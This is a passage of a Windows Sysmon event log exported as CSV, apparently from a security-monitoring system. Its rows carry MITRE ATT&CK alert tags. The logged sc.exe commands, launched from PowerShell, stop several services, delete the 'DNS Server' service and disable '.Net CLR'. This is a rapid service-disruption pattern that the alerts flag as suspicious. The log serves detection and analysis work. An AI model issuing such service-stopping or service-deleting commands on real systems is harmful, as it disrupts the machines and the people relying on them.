"".Net CLR"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \"".Net CLR\"" Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.154168300Z"",""eventRecordID"":""2769"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.151\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-001097732100}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \"".Net CLR\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.151"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-001097732100}"",""processId"":""2872"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\"".Net CLR\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.627",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.124 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010e0712100} +ProcessId: 2128 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.126724300Z"",""eventRecordID"":""2767"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.124\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010e0712100}\r\nProcessId: 2128\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.124"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010e0712100}"",""processId"":""2128"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.557",8,"ATT&CK T1489: Stop Windows Service","""Process 
Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.085 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c6f2100} +ProcessId: 5612 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.089882900Z"",""eventRecordID"":""2764"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.085\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c6f2100}\r\nProcessId: 5612\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.085"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00105c6f2100}"",""processId"":""5612"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.509",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.059 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010ae6d2100} +ProcessId: 1088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \""DNS 
Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.062439100Z"",""eventRecordID"":""2762"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.059\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010ae6d2100}\r\nProcessId: 1088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.059"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010ae6d2100}"",""processId"":""1088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.485",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.040 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010886c2100} +ProcessId: 7812 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.043139600Z"",""eventRecordID"":""2761"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.040\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010886c2100}\r\nProcessId: 7812\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:30.040"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010886c2100}"",""processId"":""7812"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.416",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.004 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010e9692100} +ProcessId: 7588 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.006018000Z"",""eventRecordID"":""2758"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.004\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010e9692100}\r\nProcessId: 7588\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.004"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010e9692100}"",""processId"":""7588"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.375",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.963 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00100f672100} +ProcessId: 7288 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 